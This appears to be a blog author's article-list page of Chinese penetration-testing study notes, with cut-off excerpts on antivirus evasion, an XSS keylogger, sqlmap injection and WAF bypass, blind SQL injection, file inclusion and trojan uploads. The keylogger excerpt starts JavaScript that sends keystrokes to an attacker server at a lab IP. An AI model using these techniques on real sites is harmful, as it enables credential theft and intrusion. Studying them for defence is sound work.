![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
笔记
文章平均质量分 91
w啥都学
这个作者很懒,什么都没留下…
展开
-
1.木马病毒和免杀技术
第17章 免杀杀毒软件叫杀毒软件变成了防病毒软件为什么叫防病毒软件应为做的黑客做出来木马病毒运行在很底层在开机运行之前木马病毒就在引导的时候已经启动了所以杀毒软件杀不了他企业的防病毒软件企业的防病毒软件都有一个单独的控制台控制台就可以控制企业下面的所以设备的安全杀毒软件的原理杀毒软件的有一个病毒库,里面存放着特征码基于对二进制的文件或者对数据包进行...原创 2020-03-31 12:51:54 · 680 阅读 · 0 评论 -
2. XSS- 键盘记录器和反射型XSS
任务099:XSS- 键盘记录器和反射型XSS进行xss利用进行键盘记录发送给黑客黑客的服务器大部分但是用的肉鸡服务器1 . 创建一个Keylogger.js文件下面文件内容意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php文件document.onkeypress = function(evt) { evt = evt || win...原创 2019-12-20 19:07:52 · 436 阅读 · 0 评论 -
5. sqlmap工具详细使用任务097:SQLMAP自动注入找到漏洞后阶段
ingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, st...原创 2019-11-30 00:51:22 · 1397 阅读 · 0 评论 -
4.任务096:SQLMAP自动注入绕过WAF , IPS
Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) ...原创 2019-11-24 12:34:32 · 761 阅读 · 0 评论 -
3 sqlmap工具详细使用 任务095:SQLMAP自动注入扫描时间和优化
任务095:SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION设置时间参数1.1设置扫描时间用sqlmap去扫描别人的网站会发送大量的请求可能目标服务器会发现你给你屏蔽掉,我们可以设置发送包的时间--delay 要指定的时间 时间是秒1.2设置超时时间--timeout 要设置的时间 默认为30秒,30要没有...原创 2019-11-19 00:06:23 · 837 阅读 · 0 评论 -
2 sqlmap工具详细使用 SQLMAP自动注入头部的修改
请求类型的参数:这些选项可用于指定如何连接到目标URL--method=method强制使用给定的HTTP方法(例如PUT)--data=要通过POST发送的数据数据字符串(例如“id=1”)PARAM-DEL = PARA。用于分割参数值的字符(例如&)--cookie=cookie HTTP cookie头值(例如“PHPSESSID=a8d127e…”)--...原创 2019-11-14 18:44:49 · 3576 阅读 · 0 评论 -
1 sqlmap工具详细使用 任务093:SQLMAP- 自动注入
任务093:SQLMAP- 自动注入 笔记 1. sqlmap介绍介绍开源sql注入漏洞检测,利用检测动态页面中get/post参数,cookie,http头数据榨取文件访问操作系统命令执行引擎强大,特性丰富Xss漏洞检测五种漏洞检测技术基于布尔的盲注检测’ and 1=1基于时间的盲注检测基于错误的检测’ and...原创 2019-11-08 10:34:45 · 395 阅读 · 0 评论 -
sql盲注 各种方法拿到 管理员账户和密码
任务092:手动漏洞挖掘-SQL盲注笔记介绍web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在下面就是没有过滤好发现了他存在sql漏洞sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了看一下返回就结果没有显示任何东西...原创 2019-11-08 10:09:05 · 1498 阅读 · 0 评论 -
2.手动挖掘漏洞,详细解说,明实验和使用
任务086:手动漏洞挖掘(二)这个是我的看的教程的笔记。里面是我自己实验的照片。挖掘漏洞原则挖掘漏洞原则是非常非常重要的1.1.所有的变量所有的变量都要去尝试,用各种各样的注入攻击手段尝试每一个变量每一个可以提交的数据的位置都要去尝试提交注入1.2.所有的头还要关住HTTP的头也是可以注入信息也可以完成相应的注入应为头也可以判断一个条件重定要关注cookie(苦k)1.3....原创 2019-09-16 14:39:19 · 752 阅读 · 0 评论 -
3.手动挖掘漏洞,详细解说,明实验和使用 文件便利,远程文件包含,本地文件包含
任务087:手动漏洞挖掘(三)Directory traversal (目录便利)目录便利漏洞: 正常情况下都是访问www里的文件。通过URL地址和参数地址从而访问到www以外的目录或文件,要是你用权限比较高的话运行服务器那么访问其他目录的权限就比较高就是服务器软件的权限File include(文件包含)文件包含漏洞:比如php的include函数他可以吧www文件以外的目录 i...原创 2019-09-22 21:05:15 · 326 阅读 · 0 评论 -
4,手动挖掘漏洞,详细解说,明实验和使用 1,文件上发漏洞
任务088:手动漏洞挖掘(四)在kali有存在典型通俗的字典文件在kali下/usr/share/wfuzz/wordlist不同的类型都放在不同的文件里下面简单介绍一下1, 文件一general 里面都是放的是猜网站文件目录的big.txt 对子目录的爆破的字典http_methods.txt http方法的字典2,文件二Injections进行注入的bad_...原创 2019-09-24 19:49:14 · 397 阅读 · 0 评论 -
5,手动挖掘漏洞,详细解说,明实验和使用 2,文件上发漏洞
可以查看a.php是什么内型的a.php文件内容文件类型是从前大概10个字节进行定义的查看前10字节可以判断文件类型把a.php修改成a.txt查看类型还是php类型应为他先看你的文件头然后在查看文件的具体内容靶机安全级别高上发a.php木马文件只能发送照片正常访问是可以正常上发的上发a.php就不能上发过去了修改文件类型也是上发过去的发送a.php是个木马没有修改的...原创 2019-09-24 20:44:06 · 300 阅读 · 0 评论 -
1.手动挖掘漏洞,详细解说,明实验和使用 (身份验证)
任务086:手动漏洞挖掘(二)这个是我的看的教程的笔记身份认证1.常用弱口令/基于字典密码爆破2.账号锁定3.信息收集手机号密码错误提示4.密码嗅探常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456账号锁定就是连续密码错误就不在登陆了信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...原创 2019-09-14 11:32:57 · 869 阅读 · 0 评论